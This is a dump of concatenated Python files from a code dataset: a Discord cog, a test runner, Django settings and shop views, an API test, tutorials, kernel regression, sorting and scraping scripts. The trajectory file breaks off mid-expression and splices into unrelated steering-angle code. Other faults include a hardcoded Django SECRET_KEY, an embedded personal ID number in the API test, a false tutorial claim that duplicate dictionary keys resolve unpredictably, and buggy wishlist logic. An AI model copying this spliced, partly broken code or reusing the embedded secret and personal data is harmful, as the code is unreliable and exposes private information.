if voice_channel in (await self._combines_category(member.guild)).voice_channels:\n player_count = await self._adjust_room_tally(member.guild, voice_channel)\n if player_count == 1:\n tier = self._get_voice_tier(voice_channel)\n await self._add_combines_voice(member.guild, combines_category, tier)\n \n async def _member_leaves_voice(self, member: discord.Member, voice_channel: discord.VoiceChannel):\n if voice_channel in (await self._combines_category(member.guild)).voice_channels:\n # DISABLED\n player_count = await self._adjust_room_tally(member.guild, voice_channel)\n if player_count == 0:\n await self._maybe_remove_combines_voice(member.guild, voice_channel)\n \n async def _get_category_by_name(self, guild: discord.Guild, name: str): \n for category in guild.categories:\n if category.name == name:\n return category\n return None\n \n # DISABLED :/ (currently only returns player count)\n async def _adjust_room_tally(self, guild: discord.Guild, voice_channel: discord.VoiceChannel):\n # possibility: only call this function when an active player triggers the call and/or make this an increment/decrement function\n fa_role = self._get_role_by_name(guild, \"Free Agent\")\n de_role = self._get_role_by_name(guild, \"Draft Eligible\")\n scout_role = self._get_role_by_name(guild, \"Combine Scout\")\n player_count = 0\n # max_size = await self._players_per_room(guild)\n for member in voice_channel.members:\n if not await self._is_public_combine(guild):\n active_player = (fa_role in member.roles or de_role in member.roles) and scout_role not in member.roles\n else:\n active_player = scout_role not in member.roles\n if active_player:\n player_count += 1\n \n # DISABLED: channel renaming\n # name_base = voice_channel.name[:voice_channel.name.index(\" (\")]\n # rename = \"{0} ({1}/{2})\".format(name_base, player_count, max_size)\n # await 
voice_channel.edit(name=rename)\n return player_count\n\n def _get_role_by_name(self, guild: discord.Guild, name: str):\n for role in guild.roles:\n if role.name == name:\n return role\n return None\n \n def _get_voice_tier(self, voice_channel: discord.VoiceChannel):\n return voice_channel.name.split()[0]\n\n async def _combines_category(self, guild: discord.Guild):\n saved_combine_cat = await self.config.guild(guild).combines_category()\n for category in guild.categories:\n if category.id == saved_combine_cat:\n return category\n return None\n \n async def _save_combine_category(self, guild: discord.Guild, category: discord.CategoryChannel):\n await self.config.guild(guild).combines_category.set(category.id)\n \n # DISABLED: channel renaming\n # async def _players_per_room(self, guild):\n # ppr = await self.config.guild(guild).players_per_room()\n # return ppr if ppr else None\n\n async def _save_players_per_room(self, guild: discord.Guild, num_players: int):\n await self.config.guild(guild).players_per_room.set(num_players)\n\n async def _room_capacity(self, guild):\n cap = await self.config.guild(guild).room_capacity()\n return cap if cap else 0\n\n async def _save_room_capacity(self, guild, capacity: int):\n await self.config.guild(guild).room_capacity.set(capacity)\n\n async def _toggle_public_combine(self, guild):\n was_public = await self._is_public_combine(guild)\n await self.config.guild(guild).public_combines.set(not was_public)\n return not was_public # is_public (after call)\n\n async def _is_public_combine(self, guild):\n return await self.config.guild(guild).public_combines()\n\n async def _save_acronym(self, guild, acronym: str):\n await self.config.guild(guild).acronym.set(acronym)\n\n async def _get_acronym(self, guild):\n return await self.config.guild(guild).acronym()\n\n","sub_path":"combineRooms/combineRooms.py","file_name":"combineRooms.py","file_ext":"py","file_size_in_byte":19333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127296719","text":"\n\nfrom xai.brain.wordbase.nouns._buzzword import _BUZZWORD\n\n#calss header\nclass _BUZZWORDS(_BUZZWORD, ):\n\tdef __init__(self,): \n\t\t_BUZZWORD.__init__(self)\n\t\tself.name = \"BUZZWORDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"buzzword\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_buzzwords.py","file_name":"_buzzwords.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89922080","text":"\nfrom time import sleep\nimport re\nfrom time import localtime, strftime\nimport csv\nimport subprocess\nimport filecmp\nimport os.path\nimport os\nimport sys\n\nclass AutoTest:\n def __init__(self, binName, inDir, outDir, expectDir):\n self.binName = binName\n self.inDir = inDir\n self.outDir = outDir\n self.expectDir = expectDir\n \n self.index=0\n\n def Execute(self, test):\n self.index += 1\n print (\"\\n------------------------------------------------------------------------------------\")\n print(\"Starting test case {}: {}......\".format(self.index, test.name), end= \"\")\n test.input = self.inDir + test.input \n test.output = self.outDir + test.output\n test.expected = self.expectDir + test.expected\n \n subprocess.call ([self.binName, test.cmd, test.input , test.output], stdout=subprocess.DEVNULL)\n \n if not os.path.exists(test.expected):\n print(\"\\n\", test.expected , \" Not found\")\n elif not os.path.exists(test.output):\n print(\"\\n\", 
test.output , \" Not found\")\n else:\n if filecmp.cmp(test.expected, test.output, shallow=False):\n print (\"Aproved!!!\")\n return True\n print (\"Failed!!\\nComparisson between {} and {} Unmatched\".format(test.output, test.expected))\n \n print(\"Failed to run: {} {} {} {}\".format(self.binName, test.cmd , test.input, test.output))\n return False\n\nclass UnitTest:\n def __init__(self, name, cmd, input, output, expected):\n self.name = name\n self.cmd = cmd\n self.input = input\n self.output = output\n self.expected = expected\n \n\nprint (\"------------------------------------------------------------------------------------\")\nprint (\" AUTO TEST STARTING \")\nprint (\"-------------------------------------------------------------------------------------\")\n\nprint (\"Starting Server ... \")\nsubprocess.Popen([str(sys.argv[1])], stdout=subprocess.DEVNULL)\n\nat = AutoTest(str(sys.argv[2]), inDir=\"test/mock/\", outDir=\"~build/x86/debug/\", expectDir=\"test/mock/expected/\")\n\ntestList = []\n\ntestList.append(UnitTest(name=\"Command Response Test \" , cmd=\"T_Command1\" , input=\"cmd1.txt\", output=\"test1.txt\", expected=\"Ret_OK.txt\"))\ntestList.append(UnitTest(name=\"Command Response Async Test \" , cmd=\"T_Command1Async\" , input=\"cmd1.txt\", output=\"test2.txt\", expected=\"Ret_OK.txt\"))\ntestList.append(UnitTest(name=\"Command Response 2 Test \" , cmd=\"T_Command2\" , input=\"n\", output=\"test3.txt\", expected=\"cmd2.txt\"))\ntestList.append(UnitTest(name=\"Event Test \" , cmd=\"T_Event1\" , input=\"cmd1.txt\", output=\"test4.txt\", expected=\"cmd2.txt\"))\n \napproved = True\nfor test in testList:\n sys.stdout.flush()\n if at.Execute(test) == False:\n approved = False\n break\n\nsys.stdout.flush()\n\nif(not approved):\n os._exit(1)\n \nprint (\"\\n------------------------------------------------------------------------------------\") \n\n\n","sub_path":"TemplateCommand/test/AutoTest.py","file_name":"AutoTest.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173806239","text":"# Django settings for plotter project.\n\n# Note: All these settings could be overriden in local_settings.py \n# Check this possiblity when debugging. \nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDEVELOPMENT = False \n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = '' # this is \nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Berlin'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'DE-de'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. 
{"seq_id":"173806239","text":"# Django settings for plotter project.\n\n# Note: All these settings could be overridden in local_settings.py \n# Check this possibility when debugging. \nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDEVELOPMENT = False \n\nDATABASE_ENGINE = 'sqlite3'           # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = ''             # this is \nDATABASE_USER = ''             # Not used with sqlite3.\nDATABASE_PASSWORD = ''         # Not used with sqlite3.\nDATABASE_HOST = ''             # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = ''             # Set to empty string for default. Not used with sqlite3.\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Berlin'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'DE-de'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '4t+b0ly^h7u1(!c*0b$u22wfz6tx5r=uqf1jllqe*i7@#4$v7e'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n    'django.template.loaders.filesystem.load_template_source',\n    'django.template.loaders.app_directories.load_template_source',\n#     'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.middleware.common.CommonMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.middleware.doc.XViewMiddleware',\n    'plotter.middleware.restful.AcceptMiddleware',\n    'plotter.middleware.debugging.AJAXSimpleExceptionResponse',\n)\n\nROOT_URLCONF = 'plotter.urls'\n\nTEMPLATE_DIRS = (\n    '/usr/share/djangoprojects/plotter/templates',\n    # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n    # Always use forward slashes, even on Windows.\n    # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.sites',\n    'django.contrib.admin',\n    'plotter.apps.dates',\n    'plotter.apps.locations',\n)\n\n# url to the image indicating that there is no static map available \nNO_STATIC_MAP = 'http://www.condominiumsph.com/img/nomap.gif'\n\n# now import local_settings, which are not under version-control.\n# see http://mccormac.org/blog/2007/mar/28/localized-settings-django/\n# make sure there is a local_settings.py file.\n# import local settings overriding the defaults\ntry:\n    from local_settings import *\nexcept ImportError:\n    try:\n        from mod_python import apache\n        apache.log_error( \"local_settings.py not set; using default settings\", apache.APLOG_NOTICE )\n    except ImportError:\n        import sys\n        sys.stderr.write( \"local_settings.py not set; using default settings\\n\" )\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"509047629","text":"import requests\nimport unittest\nimport json\n\nclass relate_loan(unittest.TestCase):\n    def test_RelevanceLoanNos(self):\n        url = 'https://testfatpsit01.yylending.com/'\n        relaloan_path = url + 'fatp-lm-service/http/lm/account/foreign/getBatchRelevanceLoanNos'\n        header = {'Content-Type':'application/json'}\n        data = {\n\t    \"certIds\": [\"330411199106121678\"\t],\n\t    \"customerIds\": [\"CT20200414000335\"]\n        }\n        relate_res = requests.post(url=relaloan_path,data=json.dumps(data),headers=header)\n        print('relate : ' + relate_res.text)\n\n\n","sub_path":"case/fatp/relateLoan.py","file_name":"relateLoan.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
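# Note on the request test above: requests can serialize the JSON payload itself via
# the json= keyword, which also sets the Content-Type header for you. A minimal
# equivalent sketch (the URL is a placeholder for illustration, not the real service):
import requests

payload = {"certIds": ["..."], "customerIds": ["..."]}
response = requests.post("https://example.com/api", json=payload)
print(response.status_code, response.text)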
{"seq_id":"144560388","text":"#-*-coding: utf-8 -*-\n\n\"\"\"\n01.dictionary.py\nDictionary - a data structure of name (key) / value (value) pairs\nlist = [1,2,3]\ntuple = (1,2,3)\ndictionary = {\"a\":100}\nOnly the creation syntax differs; element access looks the same! a[0]\n\"\"\"\n\ndic = { \"name\": \"철수\", \"phone\": \"010-9473-4201\", \"birth\":\"0115\"}\nprint(dic)\n\n# Access a specific element\nprint(dic[\"name\"])\n\n# Change the value of a specific element\ndic[\"name\"]= \"다은\"\nprint(dic[\"name\"])\n\n# Using a key that does not exist raises an error. \n# Assigning a value to a key that does not exist adds it. \ndic[\"height\"]=163\nprint(dic)\n\n# A dictionary can contain lists or other dictionaries -> information can be represented hierarchically\naddr = [\"서울\", \"서초구\", \"강남대로\"]\ngrade = {\"korean\":93, \"math\":77, \"english\":82}\n\nmember = {\n\t\"userid\":\"python\", # string data\n\t\"age\" :20,\t\t\t# integer data\n\t\"addr\" : addr,\t\t# list data\n\t\"grade\" : grade\t\t# dictionary data\n}\n\nprint(member)\n\n# Accessing nested values\nprint(member[\"addr\"][0])\nprint(member[\"grade\"][\"korean\"])\n\n# Direct hierarchical form of a dictionary # a table of Seoul/Daejeon/Daegu population counts with a total, rewritten like this\nmydic = {\n\t'total':1962,\n\t'city':['서울','대전','대구'],  # the city names must be quoted strings, otherwise this raises NameError\n\t'population':[987,78,87],\n\t'date': {'yy':2018, 'mm':10, 'dd':12}\n}\n\n# In a list, the order of the data matters \n# In a dictionary you look things up by name, so order does not matter. \n# If a key is duplicated, all but one entry are ignored; which one survives is unpredictable\n# Unlike a list, a dictionary does not rely on the order of its data.\n# Keys can also be integers. \nrank = {0:\"python\", 1:\"R\"}\n\n# Delete a specific element -> remove the entry whose key is 1\ndel(rank[1])\n\n# A list whose elements are dictionaries -> a table-like structure\ngrade = [\n{\"딕셔너리1\":1},{\"딕셔너리2\":2},{\"딕셔너리3\":3}\n]\n","sub_path":"section03/01-dictionary.py","file_name":"01-dictionary.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"12531987","text":"import numpy as np\nimport math\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nimport time\nimport random as rand  # random.gauss supplies the Gaussian noise used below\na = 1\nl = 1\nN = 2000\nh_n = 0.05\nm = lambda x: math.atan(a*x)\n\ndef Boxcar(v):\n    if v < 1 and v > -1:\n        return 0.5\n    else:\n        return 0\n\ndef Gaussian(v):\n    return (1/math.sqrt(2*math.pi))*math.exp(-(v**2)/2)\n\ndef Epanechnikov(v):\n    if v < 1 and v > -1:\n        return 0.75*(1-v**2)\n    else:\n        return 0\n\ndef Tricube(v):\n    if v < 1 and v > -1:\n        return (70/81.0)*((1-abs(v)**3)**3)\n    else:\n        return 0\n\n# Kernel used by reg(); K was undefined in the original, any of the kernels above can be substituted\nK = Gaussian\n\ndef reg(x, Xs, Ys):\n    nominator = 0.0\n    denominator = 0.0 \n    for i in range(len(Xs)):\n        nominator += Ys[i]*K((Xs[i]-x)/h_n)\n        denominator += K((Xs[i]-x)/h_n)\n    return nominator/denominator\n\nvalues = []\nrealValues = []\nregValues = []\nXs = []\n\nUmin = -2\nUmax = 2\nstep = (Umax - Umin)/float(N)\nfor i in range(N):\n    x = Umin + (i * step)\n    z = rand.gauss(0, l**2)\n    values.append(m(x)+z)\n    realValues.append(m(x))\n    Xs.append(x)\n\nfor i in range(N):\n    print(f'{int(i*100/float(N))}%')\n    x = Umin + (i * step)\n    regValues.append(reg(x, Xs, values))\nplt.plot(Xs, realValues)\nplt.plot(Xs, regValues)\nplt.show()\n","sub_path":"lab6/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
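# The reg() function above is the Nadaraya-Watson kernel-regression estimator:
# r(x) = sum_i y_i * K((x_i - x)/h) / sum_i K((x_i - x)/h). A tiny self-contained
# check with the same Gaussian kernel (points and bandwidth made up for illustration):
import math

def gaussian(v):
    return math.exp(-v * v / 2) / math.sqrt(2 * math.pi)

def nw_estimate(x, xs, ys, h):
    weights = [gaussian((xi - x) / h) for xi in xs]
    return sum(w * y for w, y in zip(weights, ys)) / sum(weights)

xs, ys = [0.0, 1.0, 2.0], [0.0, 1.0, 4.0]
print(nw_estimate(1.0, xs, ys, h=0.5))  # ~1.21: mostly y=1, pulled upward by the y=4 neighbour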
{"seq_id":"606653006","text":"import random\n\n\ndef bubble_sort(items):\n    # Loop up to the length of the list\n    for i in range(len(items)):\n        swapped = False\n        # Run another loop over a shrinking range, swapping adjacent elements to push the largest to the end\n        # Each iteration will put the max element at the end\n        for j in range(1, len(items) - i):\n            # If the current element is smaller than the previous one, swap them\n            if items[j] < items[j - 1]:\n                items[j], items[j - 1] = items[j - 1], items[j]\n                swapped = True\n\n        # Check if any swap happened; if not, the list is already sorted\n        if not swapped:\n            break\n\n    return items\n\n\n# items = [90, 80, 37, 31, 15, 10]  # Reverse sorted - Worst case\n# items = [10, 35, 31, 37, 80]  # Nearly sorted - close to the best case for the early exit\nitems = [random.randint(0, 100) for i in range(10)]  # Generate a random list\nprint(items)\nprint(\"Sorted : {}\".format(bubble_sort(items)))\n","sub_path":"DataStructures/Basics/Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"298322504","text":"from distutils.core import setup, Extension\n\nmodule1 = Extension(\"xorhash\",\n                    sources=[\"xorhash.c\"],\n                    extra_compile_args=[\"-std=c99\"])\n\nsetup(name=\"xorhash\",\n      version=\"0.0\",\n      description=\"XorHash for NDN-NIC simulator\",\n      ext_modules=[module1])\n","sub_path":"xorhash-c/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"246389558","text":"import numpy as np \nimport pims\nimport skimage as ski \nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport trackpy as tp\nfrom trackpy import predict\nimport pickle \nfrom scipy import interpolate\n\n\nclass Trajectory:\n    \"\"\"This class represents a trajectory of a particle. \n    It either intakes a pandas df with frames,x,y keys from the generate_trajectories method,\n    or it intakes a dict of positions, frames, and times as might come from \n    the output of trajectory_instance.__dict__ (from the Trajectory class)\"\"\"\n\n    def __init__(self, particledata, side):\n        pdats = particledata \n\n        if side=='L':\n            fps = 188.04\n        elif side=='R':\n            fps = 190.40\n        else:\n            raise ValueError('side is either L or R')\n\n        if isinstance(pdats, pd.DataFrame):\n            self.positions = np.array([pdats['y'].values,pdats['x'].values]).T\n            self.frames = np.array(pdats['frame'])\n            self.times = np.array(pdats['frame'])/fps\n        else: \n            self.positions = pdats['positions']\n            self.frames = pdats['frames']\n            self.times = pdats['times']\n\n        self.side = side\n        self.link = None\n    \n    @property\n    def T(self):\n        return np.median(self.times)\n    \n    def __len__(self): \n        return len(self.frames)\n    \n    def __eq__(self, other):\n        return np.alltrue(self.positions==other.positions) and np.alltrue(self.times==other.times)\n    \n    def __repr__(self):\n        length = np.amax(self.positions[:,1])-np.amin(self.positions[:,1])\n        return self.side + ' trajectory of length %d pixel '%length + 'at median time %03f s '%self.T\n\n# load all of the trajectories larger than some size into trajectory objects \ndef generate_trajectories(frames,side,minlength=7):\n    \"\"\"given a pandas df of linked features, generate a list of trajectories.\n    The pandas df should contain keys 'x','y','particle','frame'\n    side = 'L' or side = 'R' sets the frame rate appropriate to each.\n    minlength is the minimum allowed number of observations of a particle\n    for the trajectory to be included. If 7 for example, it was seen\n    in 7 frames\"\"\"\n    trajs = []\n    for p in set(frames.particle): # particle index\n        pdats = frames[frames['particle']==p] # particledata. 
This is the input of the trajectory class init \n ptraj = Trajectory(pdats,side)\n if len(ptraj)>=minlength:\n trajs.append(ptraj)\n return np.array(sorted(trajs,key=lambda t: t.T))\n\ndef distance_filter(trajs,dr=100):\n \"\"\" filter trajectories that do not have a long enough travel distance dr\"\"\"\n def filter_fn(traj,dr=dr):\n \"\"\"return True if the spatial length of a trajectory between start and end points exceeds dr\"\"\"\n positions = traj.positions\n mins = np.amin(positions,axis=0)\n maxs = np.amax(positions,axis=0)\n return np.linalg.norm(mins-maxs)>dr\n return np.array([t for t in trajs if filter_fn(t)])\n\ndef interp_trajectories(trajs,side):\n \"\"\" a trajectory is a sample of the continuous particle motion at a given rate.\n The left and right frame rates do not match. This function interpolates the samples\n into continous splines, then resamples the splines at a common framerate of 1000.0fps\n It is pretty slow. It will return a set of trajectories resampled at 1000.0fps. \n \n Inputs include trajs a numpy array full of Trajectory instances, and side = 'L' or 'R' \n which fixes the frame rate.\"\"\"\n if side=='L':\n fps = 188.04\n elif side=='R':\n fps = 190.40\n else:\n raise ValueError('side is either L or R')\n \n out = []\n for ind,t in enumerate(trajs):\n if ind%100==0:\n print('trajectory {} processed'.format(ind), end='\\r')\n # get particle data from t \n positions = t.__dict__['positions']\n times = t.__dict__['times']\n frames = t.__dict__['frames']\n # now interpolate these positions through time \n xterp = interpolate.interp1d(times,positions[:,0],kind='cubic')\n yterp = interpolate.interp1d(times,positions[:,1],kind='cubic')\n pos_terp = lambda t: np.array([xterp(t),yterp(t)])\n \n # now get the range of t across the trajectory \n # this is interpolating at 1000 fps from above t0 to below t1\n fps_common = 1000.0\n t0 = min(times)\n t1 = max(times)\n t02 = np.floor(t0)\n t12 = np.ceil(t1)\n otimes = np.linspace(t02,t12,(t12-t02)*fps_common)\n\n o_times = otimes[np.bitwise_and(otimes>t0,otimes 0:\n angle_diffs.append(angle_steers - angles[index - 1])\n else:\n angle_diffs.append(0)\n\n index += 1\n\n # pl.figure()\n # pl.plot(angles)\n # pl.hist(angle_diffs, bins=1000)\n # pl.show()\n\n np_times = np.array(times)\n np_angles = np.array(angles)\n np_angle_diffs = np.array(angle_diffs)\n\n output = {}\n output['time'] = np_times\n output['angles'] = np_angles\n output['angle_diffs'] = np_angle_diffs\n\n io.savemat('large-dataset.mat', output)","sub_path":"angle_time.py","file_name":"angle_time.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"24345031","text":"import requests\nfrom bs4 import BeautifulSoup as BS\nimport re\n\nheaders = \"{'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}\"\nurl = 'http://www.gammatest.net/course/python'\nr = requests.get(url)\n\nsoup = BS(r.content, 'html.parser')\n#print(soup.find_all(['a', 'table']))\n#print(soup.find_all(True))\n\n#print(soup.find_all(class_=re.compile('md')))\n#print(soup.find_all('h2', string=True)) # vse h2 v kotoryh est' stroka\n\n#result = soup.find_all('h2', string=True)\n#for tag in result:\n# print(tag.text)\n\n\n#for tag in soup.find_all(True):\n# print(tag.name)\n\n#print(soup.find_all('title'))\n#print(soup.title)\n\n\n#print(soup.find_all('a'))\n#print(soup.a) # vydajot pervyj a\n\nmatch = soup.find('a', 
text='Перейти')\n#print(match)\n#print(match.find_next('a'))\nmatch2 = match.find_parent().find_parent().find_parent()\nchld = match2.findChildren()\nfor child in chld:\n print(child.findChildren())\n","sub_path":"032_html_Beautiful_soup.py","file_name":"032_html_Beautiful_soup.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390843691","text":"#Yr5_HBL_(e)\n#Zhan Yuli\n\nuname = input(\"Username search:\")\n\n#Test data\ndata = [[\"Wzc\",100],[\"Sk\",100],[\"wcm\",20],[\"zyl\",200]]\n\nfound = False\n#Linear search\nfor i in range(0,len(data)):\n\tif data[i][0] == uname:\n\t\tprint(data[i][0],data[i][1])\n\t\tfound = True\n\nif not found:\n\tprint(\"Username not found.\")\n\n","sub_path":"Yr5_HBL_e.py","file_name":"Yr5_HBL_e.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"614003121","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.utils import timezone\nfrom django.utils.crypto import get_random_string\nfrom order.models import (\n ShopCart, ShopCartForm, OrderForm,\n OrderInfo, OrderProduct, PaymentForm,\n Payment,Variants,Wishlist,WishlistForm\n)\nfrom user.models import UserProfile\nfrom home.models import Product\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\n# for debit card condition\nfrom itertools import groupby\nimport re\n\n@login_required(login_url='/')\ndef addtoshopcart(request,id):\n url = request.META.get('HTTP_REFERER')\n current_user = request.user\n variantid = request.POST.get('variantid')\n checkvariant = ShopCart.objects.filter(variant_id=variantid)\n\n checkproduct = ShopCart.objects.filter(product_id=id)\n if checkproduct and checkvariant:\n control = 1\n else:\n control = 0\n\n if request.method =='POST':\n form =ShopCartForm(request.POST)\n if form.is_valid():\n if control == 1:\n try:\n data = get_object_or_404(ShopCart,product_id=id)\n data.quantity += form.cleaned_data['quantity']\n data.save()\n \n except (ObjectDoesNotExist, MultipleObjectsReturned):\n messages.error(request,'it is minimum order, Plese select other order')\n return HttpResponseRedirect('/')\n\n else:\n data = ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.variant_id = variantid\n data.quantity = form.cleaned_data['quantity']\n data.save()\n return HttpResponseRedirect(url)\n else:\n if control == 1:\n data = ShopCart.objects.get(product_id=id)\n data.quantity +=1\n data.save()\n else:\n data =ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.quantity = 1\n data.variant_id=None\n data.save()\n return HttpResponseRedirect(url)\n \n\ndef shopcart(request):\n product = Product.objects.all()\n current_user = request.user\n shpcart = ShopCart.objects.filter(user_id = current_user.id)\n if request.method =='POST':\n comment = request.POST['comment']\n add = shpcart(comment=comment)\n add.save()\n page = request.GET.get('page',1)\n\n paginator = Paginator(shpcart,4) #pagination start in search page\n try:\n shpcart = paginator.page(page)\n except PageNotAnInteger:\n shpcart = paginator.page(1)\n except EmptyPage:\n shpcart = paginator.page(paginator.num_pages)\n\n count 
= ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shpcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n \n context = {'shpcart':shpcart, 'total':total,'product':product}\n return render(request,'shop_cart.html',context)\n\n\ndef addtowishlist(request, id):\n url = request.META.get('HTTP_REFERER')\n current_user = request.user\n checkproduct = Wishlist.objects.filter(product_id=id)\n\n if checkproduct:\n control = 1\n else:\n control = 0\n\n if request.method =='POST':\n form =WishlistForm(request.POST)\n if form.is_valid():\n if control == 1:\n data = Wishlist.objects.get(product_id=id)\n data.save()\n\n else:\n data = Wishlist()\n data.user_id = current_user.id\n data.product_id = id\n data.save()\n return HttpResponseRedirect('/order/wishlist')\n else:\n if control == 1:\n data = Wishlist.objects.get(product_id=id)\n data.quantity +=1\n data.save()\n else:\n data =ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.quantity = 1 \n data.save()\n return HttpResponseRedirect(url)\n\n\ndef wishlist(request):\n product = Product.objects.all()\n current_user = request.user \n count = Wishlist.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n messages.error(request,\"You have no product in wishlist\")\n return HttpResponseRedirect('/')\n \n else:\n profile = UserProfile.objects.get(user_id = current_user.id)\n shpcart = Wishlist.objects.filter(user_id = current_user.id)\n context = {'product':product, 'shpcart':shpcart,'profile':profile}\n return render(request,'wishlist.html',context)\n\n\n\ndef deletefromcart(request,id):\n ShopCart.objects.filter(id=id).delete()\n messages.success(request,\"Your item deleted form ShopCart\")\n return HttpResponseRedirect('/shopcart/')\n\ndef deletefromwishlist(request,id):\n Wishlist.objects.filter(id=id).delete()\n messages.success(request,\"Your item deleted form ShopCart\")\n return HttpResponseRedirect('/order/wishlist')\n\n\ndef checkout(request):\n current_user = request.user\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shopcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n \n if request.method =='POST':\n form = OrderForm(request.POST)\n if form.is_valid():\n data = OrderInfo()\n data.first_name = form.cleaned_data['first_name']\n data.last_name = form.cleaned_data['last_name']\n data.email = form.cleaned_data['email']\n data.address = form.cleaned_data['address']\n data.country = form.cleaned_data['country']\n data.city = form.cleaned_data['city']\n data.phone = form.cleaned_data['phone']\n data.address = form.cleaned_data['address']\n data.user_id = current_user.id\n data.total = total\n ordercode = get_random_string(5).upper()\n data.code = ordercode\n data.save()\n\n schopcart = ShopCart.objects.filter(user_id=current_user.id)\n for ps in schopcart:\n detail = OrderProduct()\n detail.order_id = data.id\n detail.product_id = ps.product_id\n detail.user_id = current_user.id\n 